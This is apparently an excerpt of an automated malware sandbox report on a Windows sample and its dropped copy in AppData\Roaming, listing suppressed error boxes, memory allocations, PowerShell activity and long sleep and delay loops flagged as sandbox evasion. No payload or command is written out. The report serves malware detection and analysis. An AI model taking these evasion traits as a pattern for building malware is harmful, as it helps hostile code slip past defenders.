                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: BF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: 8CF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: 6BA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: 9CF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: ACF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: B120000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: C120000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: D120000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMemory allocated: E70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMemory allocated: 4960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMemory allocated: 86A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMemory allocated: 7070000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMemory allocated: 96A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMemory allocated: A6A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMemory allocated: AC40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMemory allocated: BC40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMemory allocated: 15A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMemory allocated: 2F50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMemory allocated: 4F50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599651Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599204Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598968Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598749Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598630Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598500Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598280Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598137Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597882Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597756Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597640Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597529Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597395Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597265Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597046Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596718Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596499Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596171Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596059Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595953Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595843Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595734Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595624Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595515Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595406Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595296Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595187Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595076Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594968Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594859Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594749Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594640Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594531Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594421Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594312Jump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599875
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599764
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599656
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599547
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599438
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599219
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599108
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599000
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598891
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598781
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598671
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598563
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598438
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598313
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598203
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598094
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597969
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597860
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597735
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597610
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597485
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597360
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597235
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597110
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596985
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596860
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596735
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596610
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596485
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596360
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596235
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595360
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595235
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595110
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594985
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594860
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594735
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594599
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594469
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594360
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594235
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594110
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8829Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 688Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8161Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeWindow / User API: threadDelayed 3258Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeWindow / User API: threadDelayed 6587Jump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeWindow / User API: threadDelayed 7184
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeWindow / User API: threadDelayed 2644
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7908Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1516Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1224Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -599874s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 5676Thread sleep count: 3258 > 30Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 5676Thread sleep count: 6587 > 30Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -599651s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -599546s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -599204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -599078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -598968s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -598859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -598749s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -598630s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -598500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -598390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -598280s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -598137s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -598031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -597882s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -597756s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -597640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -597529s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -597395s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -597265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -597156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -597046s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -596937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -596828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -596718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -596609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -596499s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -596390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -596281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -596171s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -596059s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -595953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -595843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -595734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -595624s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -595515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -595406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -595296s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -595187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -595076s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -594968s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -594859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -594749s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -594640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -594531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -594421s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940Thread sleep time: -594312s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 1256Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep count: 35 > 30
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -32281802128991695s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -599875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 6028Thread sleep count: 7184 > 30
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 6028Thread sleep count: 2644 > 30
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -599764s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -599656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -599547s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -599438s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -599328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -599219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -599108s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -599000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -598891s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -598781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -598671s >= -30000s
